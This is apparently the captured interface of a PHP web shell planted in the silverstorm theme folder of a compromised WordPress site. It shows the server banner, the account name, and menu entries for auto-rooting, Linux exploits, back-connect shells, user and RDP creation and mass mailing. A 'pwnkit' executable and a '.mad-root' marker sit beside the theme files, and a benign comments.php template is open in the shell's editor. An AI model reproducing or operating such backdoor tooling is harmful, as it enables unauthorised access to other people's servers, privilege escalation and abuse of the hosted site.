Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
silverstorm /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
110
B
-rw-r--r--
comments.php
1.43
KB
-rw-r--r--
footer.php
118
B
-rw-r--r--
functions.php
1.66
KB
-rw-r--r--
header.php
591
B
-rw-r--r--
index.php
86
B
-rw-r--r--
page.php
103
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
9.12
KB
-rw-r--r--
screenshot.jpg
52.2
KB
-rw-r--r--
sidebar-ecommerce-left.php
112
B
-rw-r--r--
sidebar.php
58
B
-rw-r--r--
single.php
102
B
-rw-r--r--
style.css
554.2
KB
-rw-r--r--
woocommerce.php
88
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php if ( post_password_required() ): return; endif; ?> <div class="post-comments"> <h3 class="comments-title"> <span class="comments-number"> <?php comments_number( __( 'No Responses', 'silverstorm' ), __( 'One Response', 'silverstorm' ), __( '% Responses', 'silverstorm' ) ); ?> </span> </h3> <ol class="comment-list"> <?php wp_list_comments( array( 'avatar_size' => '32', ) ); ?> </ol> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ): ?> <div class="navigation"> <div class="prev-posts"> <?php previous_comments_link( __( '<i class="font-icon-post fa fa-angle-double-left"></i> Older Comments', 'silverstorm' ) ); ?> </div> <div class="next-posts"> <?php next_comments_link( __( 'Newer Comments <i class="font-icon-post fa fa-angle-double-right"></i>', 'silverstorm' ) ); ?> </div> </div> <?php endif; ?> <?php if ( ! comments_open() && get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ): ?> <p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'silverstorm' ); ?></p> <?php endif; ?> </div> <!-- /post-comments --> <div class="comments-form"> <div class="comment-form"> <?php comment_form( array( 'class_submit' => 'button blue small', ) ); ?> </div> </div>
Close